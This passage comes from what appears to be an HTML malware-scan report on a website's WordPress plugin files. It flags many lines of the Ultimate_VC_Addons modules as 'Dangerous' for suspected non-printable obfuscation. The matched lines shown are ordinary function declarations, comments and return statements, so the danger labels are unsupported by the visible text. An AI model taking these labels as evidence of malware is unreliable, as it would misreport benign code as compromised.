</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1114</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 115</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_ihover_item_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate iHover Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate iHover module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Ultimate iHover Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_ihover_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$item_output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">common_structure</span><span style="color: #007700">( </span><span style="color: #0000BB">$desc_responsive</span><span style="color: #007700">, </span><span style="color: #0000BB">$title_responsive</span><span style="color: #007700">, </span><span style="color: #0000BB">$heading_block</span><span style="color: #007700">, </span><span style="color: #0000BB">$title_style</span><span style="color: #007700">, </span><span style="color: #0000BB">$ult_ihover_settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$spacer_style</span><span style="color: #007700">, </span><span style="color: #0000BB">$spacer_line_style</span><span style="color: #007700">, </span><span style="color: #0000BB">$description_block</span><span style="color: #007700">, </span><span style="color: #0000BB">$desc_style</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 496</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Ultimate iHover Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 500</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_ihover_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 502</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_427").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_google_trends.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 11.22 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 11</span><br><table id="file_428" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_VC_Addons_Google_Trends</span><span style="color: #007700">(); if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Ultimate_Google_Trends' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_Ultimate_Google_Trends </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Google Trends Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Google Trends module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 194</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Ultimate Google Trends Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 200</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_ultimate_trends</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 243</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Ultimate Google Trends Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">google_trends_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_428").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_countdown.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 26.69 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 15</span><br><table id="file_429" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } </span><span style="color: #0000BB">$ult_countdown </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_CountDown</span><span style="color: #007700">(); if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Ult_Countdown' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_Ult_Countdown </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate CountDown Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate CountDown module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">to regester style </span><span style="color: #007700">and </span><span style="color: #0000BB">scripts</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">count_down_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function for </span><span style="color: #0000BB">button admin script</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">icon block</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 465</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">countdown_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 61</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">to intialize the button module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">countdown_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 676</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 67</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 683</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Countdown Module</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_429").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_image_separator.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.73 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 14</span><br><table id="file_430" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Image_Separator' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_image_separator </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Image_Separator</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Image Separator Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Image Separator module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Image Separator Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 193</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_img_separator_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 280</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Functions</span><span style="color: #007700">.</span><span style="color: #0000BB">RestrictedFunctions</span><span style="color: #007700">.</span><span style="color: #0000BB">wp_is_mobile_wp_is_mobile</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that register styles </span><span style="color: #007700">and </span><span style="color: #0000BB">scripts </span><span style="color: #007700">for </span><span style="color: #0000BB">Image Separator Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_easy_separator_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 347</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Image Separator Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_img_separator_init</span><span style="color: #007700">() {</span>
</span>
